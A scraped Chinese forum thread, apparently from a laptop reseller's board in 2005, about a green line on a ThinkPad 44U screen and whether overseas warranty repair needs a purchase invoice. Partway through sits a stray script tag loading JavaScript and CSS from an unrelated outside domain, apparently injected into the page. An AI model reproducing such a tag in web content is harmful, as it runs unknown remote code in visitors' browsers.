开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

44U屏幕出现问题

8月份买的44U,最近发现屏幕的右侧出现了一条绿线,打游戏和看电影时尤其明显。截图见附件。请问该如何解决。
保修范围内,拿回来保修
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

看您的IP不在中国的话修起来更方便,直接打相关地区的电话,具体请看这个帖子http://www.xynbnb.com/viewthread.php?tid=7971&extra=page%3D1
帮你查了下丹麦的,贴出来您看看
感谢大半夜就给回复。请问仅凭序列号,没有购机发票在国外给修吗?
仅凭序列号就可以
在国外包修真是方便!
那该说是在哪里买的呢?美国,香港还是中国?
他不会问你的,因为他没有那个权利,国外保修很好的。
知道了,去试试。
放心,事实证明在国外保修非常好,赶快去体验上帝的感觉吧
我也想到国外去修啊.哈哈.
最好到日本去修,把他们的配件消耗完.
把人家配件消耗完…………亏你想得出来
原帖由 fujijunzhejiang 于 2005-11-22 12:43 发表
我也想到国外去修啊.哈哈.
最好到日本去修,把他们的配件消耗完.

高!实在是高!!!
看来在国外本本出点问题,是因祸得福啊,中国制造变成美国原装拉。
唉,买完后能出国就好了~~~
今天去修了。除了序列号外还要购机发票,我晕。购机发票我到现在还没收到,就不可能带出国。悟空城之王,怎么给我解决发票的问题?
原帖由 biglau01 于 2005-11-23 21:51 发表
今天去修了。除了序列号外还要购机发票,我晕。购机发票我到现在还没收到,就不可能带出国。悟空城之王,怎么给我解决发票的问题?

人家看你是中国人好欺负,扯蛋呢,你就理直气壮得和他说“ibm的保修规定中没有要求什么狗屁发票,你给不给我修否则我投诉你”,这样你再看看他还敢不敢忽悠你。。。
楼上这个必须顶,咱中国人也不是好欺负的.
顶啊,作死的顶,俺也是在想到国外如果出了问题是不是真的那么容易搞定

没有要求什么狗屁发票?YY老大犯规说脏话喽,哈哈

呵呵,想知道结果,到底给保修了没?
结果如何呢?没有下文了
期待下文 出国前也买台带出去
今天又去确认了一下,必须要购机发票。他害我白跑一趟,我决定去投诉他。
看来机子只能等半个月后回国斑竹给修了。你们不会也要购机发票吧,哈哈